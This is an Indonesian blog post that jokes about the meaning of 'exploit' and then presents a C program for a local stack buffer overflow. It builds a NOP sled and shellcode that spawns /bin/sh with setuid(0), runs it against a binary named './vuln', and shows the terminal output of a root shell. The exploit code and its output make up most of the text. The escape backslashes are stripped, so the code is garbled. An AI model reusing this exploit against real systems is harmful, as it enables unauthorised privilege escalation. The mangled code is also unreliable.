arti dalam bahasa indonesia mungkin, memanfaatkan atau menipu atau, pokok nya itu deh 😀 … kegiatan ini sama halnya dengan naik pangkat secara tidak benar yang di tempuh dengan membodoh-bodohi sistem kepegawaian … wekekeke kok sampai kesitu yah Bahh..
berikut contoh nya, sekali lagi ini hanya contoh yah, jangan di coba dirumah, tingkat kegagalannya 100% trus buat apa ada tulisan ini, mari nikmati saja HAHAHA …
#include <stdlib.h> char shellcode[] = "x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0" "x88x43x07x89x5bx08x89x43x0cxb0x0bx8dx4bx08x8d" "x53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73" "x68"; unsigned long sp(void) { __asm__("movl %esp, %eax");} int main(int argc, char *argv[]) { int i, offset; long esp, ret, *addr_ptr; char *buffer, *ptr; offset = 0; esp = sp(); ret = esp - offset; printf("Stack pointer (ESP) : 0x%xn", esp); printf(" Offset from ESP : 0x%xn", offset); printf("Desired Return Addr : 0x%xn", ret); buffer = malloc(600); ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 600; i+=4) { *(addr_ptr++) = ret; } for(i=0; i < 200; i++) { buffer[i] = 'x90'; } ptr = buffer + 200; for(i=0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buffer[600-1] = 0; execl("./vuln", "vuln", buffer, 0); free(buffer); return 0; } //Setelah itu compile lah listing di atas, dan abadikan perbuatan mu :P$ gcc -o exploit exploit.c $ ./exploit Stack pointer (ESP) : 0xbffff978 Offset from ESP : 0x0 Desired Return Addr : 0xbffff978 sh-2.05a# whoami root sh-2.05a#